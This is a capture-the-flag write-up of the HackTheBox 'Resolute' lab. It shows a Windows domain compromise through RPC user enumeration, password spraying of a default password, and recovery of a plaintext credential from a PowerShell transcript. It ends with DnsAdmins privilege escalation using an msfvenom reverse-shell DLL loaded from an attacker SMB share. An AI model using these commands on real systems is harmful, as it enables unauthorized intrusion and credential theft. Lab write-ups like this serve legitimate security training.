HackTheBox - Resolute

30-05-2020

— Written by hg8 — 13 min read

Resolute just retired on Hackthebox, it’s a medium difficulty Windows box. Still being a bit new to the Windows environment the enumeration process got a bit long and tedious for me at some point but in the end I managed to see real life scenarios and access to root, or should I say SYSTEM. I would recommend this box if you are confortable on easy boxes and want to level up to a medium one.

Tl;Dr: To get the user flag you first had to enumerate users using RPC, doing so you find a default password in one user description field. This password allows you to connect to Melanie user through WinRM and get the user flag.
For the root flag you first have to pivot to Ryan user using his credentials hard-coded in a Powershell script transcript. Ryan being a DNS Admin we can exploit a DLL Injection attack into the DNS service running as SYSTEM to execute a privileged reverse shell and grab the root flag.

Alright! Let’s get into the details now!

First thing first, let’s add the box IP to the hosts file:

1	[hg8@archbook ~]$ echo "10.10.10.169 resolute.htb" >> /etc/hosts

and let’s start!

User Flag

Recon

Let’s start with the classic nmap scan to see which ports are open on the box:

[hg8@archbook ~]$ nmap -sV -sT -sC --top-ports 10000 resolute.htb                                                     
Nmap scan report for resolute.htb (10.10.10.169)
PORT      STATE SERVICE      VERSION
53/tcp    open  tcpwrapped
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-28 13:32:03Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|_  Forest name: megabank.local

Nmap done: 1 IP address (1 host up) scanned in 150.18 seconds

So the box is running Windows Server 2016 Standard 14393 and have several common port open that will probably come useful later like rpc, ldap or winrm. Yet we don’t have FTP, HTTP nor SSH port open so let’s continue our enumeration to grab more information about this box.

Since port 135 RPC is open we should be able to enumerate users, let’s run enum4linux to see what we can get:

[hg8@archbook ~]$ enum4linux 10.10.10.169 2>/dev/null
Starting enum4linux v0.8.9 
[...]

 =============================
|    Users on 10.10.10.169    |
 =============================
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela       Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette      Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika       Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire       Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude       Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia      Name: (null)    Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo      Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki        Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo        Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally        Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon        Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve        Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie       Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita       Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)
[...]

enum4linux complete

We notice something very interesting on marko user:

Desc: Account created. Password set to Welcome123!

Looks like new accounts get a default password set to Welcome123!.

Since we have port WinRM port 5985 open maybe we can list marko files:

1
2
3

[hg8@archbook ~]$ smbclient -U 'marko' //10.10.10.169/c$
Enter MYGROUP\marko's password: Welcome123!
session setup failed: NT_STATUS_LOGON_FAILURE

No luck here. Seems like marko either already change his password…

Brute-force using default password

Since Welcome123! seems to be the default password for newly created accounts maybe other users still uses this password ?

With the list of users we retrieve earlier let’s run crackmapexec to see if any account can login with Welcome123! :

[hg8@archbook ~]$ crackmapexec smb 10.10.10.169 -u users.txt -p password.txt
SMB  10.10.10.169  445  RESOLUTE  [*] Windows Server 2016 Standard 14393 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB  10.10.10.169  445  RESOLUTE  [+] megabank.local\melanie:Welcome123!

Bingo! We have Melanie account credentials. What now?

LDAP Dump

Since ldap port is open let’s dump Active Directory information from it using ldapdomaindump:

[hg8@archbook ~]$ ldapdomaindump -u MEGABANK\\melanie 10.10.10.169
Password:
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

We can now open an python http server to take a look at the informations nicely formatted in HTML format:

1 2	[hg8@archbook ~]$ python -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Browsing to domain_users_by_group.html we notice that Melanie belongs to “Remote Management Users”:

Shell as Melanie

Since melanie is part of Remote Management Users and WinRM port is open we can probably use it to get a shell:

[hg8@archbook ~]$ evil-winrm -i 10.10.10.169 -u melanie -p "Welcome123\!"

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> type ..\Desktop\user.txt
0xxxxxxxxxxxxxxxxxx0

Root FLag

Recon

Looking around we notice another user account named Ryan:

*Evil-WinRM* PS C:\> dir C:\Users

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        9/27/2019   7:05 AM                ryan

We are probably going to have to pivot to his account. Let’s keep that in mind and continue our recon process.

Pivot melanie -> ryan

Digging in we found an uncommon hidden folder named PSTranscripts at the root of C:\:

*Evil-WinRM* PS C:\> ls -Hidden

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/28/2020   4:52 AM      402653184 pagefile.sys

Navigating to this folder we stumble upon a Powershell transcript text file:

*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -Hidden


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

Let’s read the full transcript:

*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************

Looks like we have Ryan clear text password in there:

1	cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

Let’s see if the credentials are valid:

[hg8@archbook ~]$ evil-winrm -i 10.10.10.169 -u ryan -p "Serv3r4Admin4cc123\!"

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents>

Bingo!

DNS Admin Privilege escalation

Ryan account password seems to mean he is the server admin (Serv3r4Admin4cc123!). Let’s see if it’s really the case:

*Evil-WinRM* PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Ryan belongs to DnsAdmins group. Since DNS service is known to run as SYSTEM maybe we can abuse our DNS admin rights to escalate our privileges.

Searching this topic online we found this article:

Abusing DNSAdmins privilege for escalation in Active Directory

This post details a feature abuse in AD where a user who is member of the DNSAdmins group or have write privileges to a DNS server object can load an arbitrary DLL with SYSTEM privileges on the DNS server.

http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html

The article mention that this attack will corrupts dns.exe service. It shouldn’t be a issue for other people working on the box since we found this note on Ryan desktop:

*Evil-WinRM* PS C:\Users\ryan\Desktop> type note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

Alright sounds like what we have all we need. Let’s give it a try.

First let’s create our malicious DLL, this one will open a reverse shell:

[hg8@archbook ~]$  msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=8585 -f dll > hg8.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes

Then we host this DLL on a Samba server we control:

[hg8@archbook ~]$ wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/smbserver.py
[hg8@archbook ~]$ cp hg8.dll ~/share/
[hg8@archbook ~]$ sudo python smbserver.py -smb2support hg8 /home/hg8/share/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-9999-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-8888-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Now we open our nc listener:

1 2	[hg8@archbook ~]$ nc -l -vv -p 8585 Listening on any address 8585

Finally we should be able to inject our DLL:

*Evil-WinRM* PS C:\> dnscmd  /config /serverlevelplugindll \\10.10.10.10\hg8\hg8.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

Then we restart the DNS service:

*Evil-WinRM* PS C:\> sc.exe stop dns
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x7530
*Evil-WinRM* PS C:\> sc.exe start dns
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 648
        FLAGS              :

We can see our DLL being injected:

[hg8@archbook ~]$ sudo python smbserver.py -smb2support hg8 /home/hg8/share/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,50246)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:9bbc3576f3dfc56f64db8c2e72c24699:010100000000000000cb8cfb1235d601e6de8a857f2b6d9f0000000001001000580058006f006300480064004200710003001000580058006f006300480064004200710002001000420055004a00700041004f004400690004001000420055004a00700041004f00440069000700080000cb8cfb1235d60106000400020000000800300030000000000000000000000000400000ca3799be54bd584fc02a5a66719df22dd96fdf85822b6023559be0d172ac9b5b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310038000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:hg8)

And after a little wait a new connection appear on our reverse shell:

[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585
Connection from 10.10.10.169:50247
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
exxxxxxxxxxxxxxxxxxxc

That’s it folks! As always do not hesitate to contact me for any questions or feedbacks!

See you next time ;)

-hg8